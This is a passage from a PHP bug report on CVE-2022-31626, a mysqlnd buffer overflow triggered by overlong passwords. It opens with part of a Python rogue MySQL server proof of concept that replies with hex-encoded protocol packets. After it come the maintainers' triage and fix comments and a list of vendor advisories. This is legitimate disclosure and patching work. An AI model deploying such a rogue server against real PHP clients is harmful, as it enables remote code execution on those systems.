        self.send('010000010f280000020364656600064556454e545308736368656d6174610244620244620cff0000010000fd81100000002a0000030364656600064556454e5453066576656e7473044e616d65044e616d650cff0000010000fd0110000000300000040364656600064556454e5453066576656e747307446566696e657207446566696e65720cff0080040000fd8110000000340000050364656600064556454e5453066576656e74730954696d65207a6f6e650954696d65207a6f6e650cff0000010000fd8110000000240000060364656600064556454e545300045479706504547970650cff0024000000fd0100000000300000070364656600064556454e5453000a457865637574652061740a457865637574652061740c3f00130000000c8000000000380000080364656600064556454e5453000e496e74657276616c2076616c75650e496e74657276616c2076616c75650cff0000040000fd00000000003e0000090364656600064556454e5453066576656e74730e496e74657276616c206669656c640e496e74657276616c206669656c640cff0048000000fe80010000002800000a0364656600064556454e54530006537461727473065374617274730c3f00130000000c80000000002400000b0364656600064556454e54530004456e647304456e64730c3f00130000000c80000000002e00000c0364656600064556454e5453066576656e747306537461747573065374617475730cff0048000000fe81110000003600000d0364656600064556454e5453066576656e74730a4f726967696e61746f720a4f726967696e61746f720c3f000a0000000321100000005200000e0364656600064556454e54530e6368617261637465725f73657473146368617261637465725f7365745f636c69656e74146368617261637465725f7365745f636c69656e740cff0000010000fd01100000004e00000f0364656600064556454e54530a636f6c6c6174696f6e7314636f6c6c6174696f6e5f636f6e6e656374696f6e14636f6c6c6174696f6e5f636f6e6e656374696f6e0cff0000010000fd01100000004a0000100364656600064556454e54530a636f6c6c6174696f6e7312446174616261736520436f6c6c6174696f6e12446174616261736520436f6c6c6174696f6e0cff0000010000fd011000000005000011fe0000220005000012fe00002200')
    elif query.startswith(b'SELECT TABLE\_NAME AS Name'):
        self.send('01000001033c0000020364656612696e666f726d6174696f6e5f736368656d61065441424c4553067461626c6573044e616d65044e616d650cff0000010000fd81100000003a0000030364656612696e666f726d6174696f6e5f736368656d61065441424c45530006456e67696e6506456e67696e650cff0000010000fd00000000003c0000040364656612696e666f726d6174696f6e5f736368656d61065441424c45530007436f6d6d656e7407436f6d6d656e740cff0000600000fc100000000005000005fe000002000a000006016106496e6e6f4442000d000007047465737406496e6e6f44420005000008fe00000200')
    elif query.startswith(b'SELECT /\*+ MAX\_'):
        self.send('01000001014e0000020364656612696e666f726d6174696f6e5f736368656d6108534348454d41544108736368656d6174610b534348454d415f4e414d450b534348454d415f4e414d450cff0000010000fd811000000005000003fe000022001300000412696e666f726d6174696f6e5f736368656d6106000005056d7973716c1300000612706572666f726d616e63655f736368656d61040000070373797305000008047465737405000009fe00002200')
    elif query.startswith(b'SHOW INDEX FROM \`test\`'):
        self.send('010000010f3500000203646566000f53484f575f53544154495354494353067461626c6573055461626c65055461626c650cff0000010000fd81100000003900000303646566000f53484f575f53544154495354494353000a4e6f6e5f756e697175650a4e6f6e5f756e697175650c3f00010000000301000000003500000403646566000f53484f575f5354415449535449435300084b65795f6e616d65084b65795f6e616d650cff0000010000fd00000000004f00000503646566000f53484f575f5354415449535449435312696e6465785f636f6c756d6e5f75736167650c5365715f696e5f696e6465780c5365715f696e5f696e6465780c3f000a0000000321100000003b00000603646566000f53484f575f53544154495354494353000b436f6c756d6e5f6e616d650b436f6c756d6e5f6e616d650cff0000010000fd00000000003700000703646566000f53484f575f535441544953544943530009436f6c6c6174696f6e09436f6c6c6174696f6e0cff0004000000fd00000000003b00000803646566000f53484f575f53544154495354494353000b43617264696e616c6974790b43617264696e616c6974790c3f00150000000800000000003500000903646566000f53484f575f5354415449535449435300085375625f70617274085375625f706172740c3f00150000000800000000001c00000a03646566000000065061636b6564000c3f00000000000680000000002d00000b03646566000f53484f575f5354415449535449435300044e756c6c044e756c6c0cff000c000000fd01000000003900000c03646566000f53484f575f53544154495354494353000a496e6465785f747970650a496e6465785f747970650cff002c000000fd81000000003300000d03646566000f53484f575f535441544953544943530007436f6d6d656e7407436f6d6d656e740cff0020000000fd01000000004600000e03646566000f53484f575f5354415449535449435307696e64657865730d496e6465785f636f6d6d656e740d496e6465785f636f6d6d656e740cff0000200000fd81100000003300000f03646566000f53484f575f53544154495354494353000756697369626c650756697369626c650cff000c000000fd01000000003900001003646566000f53484f575f53544154495354494353000a45787072657373696f6e0a45787072657373696f6e0cff00fffffffffc900000000005000011fe0000020005000012fe00000200')
    elif query.startswith(b'EXPLAIN PARTITIONS SELECT \* FROM '):
        self.send('b2000001ff2804233432303030596f75206861766520616e206572726f7220696e20796f75722053514c2073796e7461783b20636865636b20746865206d616e75616c207468617420636f72726573706f6e647320746f20796f7572204d7953514c207365727665722076657273696f6e20666f72207468652072696768742073796e74617820746f20757365206e656172202753454c454354202a2046524f4d20746573742e7465737427206174206c696e652031')
    elif query.startswith(b'SELECT \* FROM test.test'):
        self.handle\_select\_test()
    elif query.startswith(b'SHOW WARNINGS'):
        self.send('01000001031b00000203646566000000054c6576656c000cff001c000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000cff0000080000fd01001f000005000005fe0000020005000006fe00000200')
    else:
        hexdump(query)
        raise ProtoError()

class SQLServer: """Rogue MySQL server. “"” session_class = None

def \_\_init\_\_(self):
    self.sessions = \[\]
    self.socket = server(3306, callback=self.accept)

def accept(self, client\_socket):
    self.sessions.append(
        self.session\_class(client\_socket)
    )

def set\_session\_handler(self, session\_class):
    self.session\_class = session\_class

def stop(self):
    self.socket.close()
    for session in self.sessions:
        session.die()

server = SQLServer() server.set_session_handler(Handler)

pause() ```

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports

[2022-05-17 13:59 UTC] [email protected]

-Status: Open +Status: Verified -Assigned To: +Assigned To: cmb

[2022-05-17 13:59 UTC] [email protected]

Thanks for reporting the issue (very thorough report)! I can reproduce the bug, and your patch would obviously solve that.

However, I’m having some issues with the server script, which apparently stalls at the end of the handshake (Handler.handle_handshake). It would be nice to commit that as regression test, though (and also as the beginning of a more general fake server test suite); maybe you have an idea how to fix that.

Anyway, as I understand it, this issue would only happen for *very* long passwords (~ 5000 bytes or more); that would likely *not* qualify this as security issue. Or are there other more likely cases which may trigger this bug?

[2022-05-25 21:34 UTC] [email protected]

I think since it can be common for a hosted tool to accept user-supplied password, and as required length is not ridiculous (5k, not gigabytes) we should treat it as security.

[2022-05-25 21:40 UTC] [email protected]

-CVE-ID: needed +CVE-ID: 2022-31626

[2022-05-31 13:43 UTC] c dot fol at ambionics dot io

Hello cmb,

Sorry for the delay, it looks like your tracker refuses to send me emails for this bug (although it works fine, usually). Have you made any progress regarding the server ? I implemented this server a long time ago, so I don’t really remember. I might be able to have a look next week if you’re still stuck.

Regards

[2022-06-07 10:27 UTC] [email protected]

> Have you made any progress regarding the server ?

No, I didn’t work further on that. I think the problem is that the test would always hang, but it was sufficient to trigger the buffer overflow. Now that the bug is fixed, the test would need to proceed.

[2022-06-15 07:24 UTC] [email protected]

-Status: Verified +Status: Closed

[2022-06-15 07:24 UTC] [email protected]

The fix for this bug has been committed. If you are still experiencing this bug, try to check out latest source from https://github.com/php/php-src and re-test. Thank you for the report, and for helping us make PHP better.

Related news

CVE-2023-21850: Oracle Critical Patch Update Advisory - January 2023

Vulnerability in the Oracle Demantra Demand Management product of Oracle Supply Chain (component: E-Business Collections). Supported versions that are affected are 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Demantra Demand Management. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Demantra Demand Management accessible data. CVSS 3.1 Base Score 7.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N).

Gentoo Linux Security Advisory 202209-20

Gentoo Linux Security Advisory 202209-20 - Multiple vulnerabilities have been discovered in PHP, the worst of which could result in local root privilege escalation. Versions less than 7.4.30:7.4 are affected.

Resolving Availability vs. Security, a Constant Conflict in IT

Conflicting business requirements is a common problem – and you find it in every corner of an organization, including in information technology. Resolving these conflicts is a must, but it isn’t always easy – though sometimes there is a novel solution that helps. In IT management there is a constant struggle between security and operations teams. Yes, both teams ultimately want to have secure

Red Hat Security Advisory 2022-5904-01

Red Hat Security Advisory 2022-5904-01 - PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. Issues addressed include a buffer overflow vulnerability.

RHSA-2022:5904: Red Hat Security Advisory: php security update

An update for php is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-31626: php: password of excessive length triggers buffer overflow leading to RCE

Ubuntu Security Notice USN-5479-3

Ubuntu Security Notice 5479-3 - USN-5479-1 fixed vulnerabilities in PHP. Unfortunately that update for CVE-2022-31625 was incomplete for Ubuntu 18.04 LTS. This update fixes the problem. Charles Fol discovered that PHP incorrectly handled initializing certain arrays when handling the pg_query_params function. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. Charles Fol discovered that PHP incorrectly handled passwords in mysqlnd. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code.

Ubuntu Security Notice USN-5479-2

Ubuntu Security Notice 5479-2 - USN-5479-1 fixed vulnerabilities in PHP. This update provides the corresponding updates for Ubuntu 16.04 ESM. Charles Fol discovered that PHP incorrectly handled initializing certain arrays when handling the pg_query_params function. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. Charles Fol discovered that PHP incorrectly handled passwords in mysqlnd. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code.

Red Hat Security Advisory 2022-5491-01

Red Hat Security Advisory 2022-5491-01 - PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. Issues addressed include buffer overflow and privilege escalation vulnerabilities.

RHSA-2022:5491: Red Hat Security Advisory: rh-php73-php security and bug fix update

An update for rh-php73-php is now available for Red Hat Software Collections. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-21703: php: Local privilege escalation via PHP-FPM * CVE-2021-21707: php: special character breaks path in xml parsing * CVE-2022-31625: php: uninitialized array in pg_query_params() leading to RCE * CVE-2022-31626: php: password of excessive length triggers buffer overflow leading to RCE

RHSA-2022:5468: Red Hat Security Advisory: php:8.0 security update

An update for the php:8.0 module is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-31626: php: password of excessive length triggers buffer overflow leading to RCE

RHSA-2022:5467: Red Hat Security Advisory: php:7.4 security update

An update for the php:7.4 module is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-31626: php: password of excessive length triggers buffer overflow leading to RCE

RHSA-2022:5471: Red Hat Security Advisory: php:7.4 security update

An update for the php:7.4 module is now available for Red Hat Enterprise Linux 8.4 Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-31626: php: password of excessive length triggers buffer overflow leading to RCE

Ubuntu Security Notice USN-5479-1

Ubuntu Security Notice 5479-1 - Charles Fol discovered that PHP incorrectly handled initializing certain arrays when handling the pg_query_params function. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. Charles Fol discovered that PHP incorrectly handled passwords in mysqlnd. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code.

CVE-2016-4343: PHP: PHP 7 ChangeLog

The phar_make_dirstream function in ext/phar/dirstream.c in PHP before 5.6.18 and 7.x before 7.0.3 mishandles zero-size ././@LongLink files, which allows remote attackers to cause a denial of service (uninitialized pointer dereference) or possibly have unspecified other impact via a crafted TAR archive.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907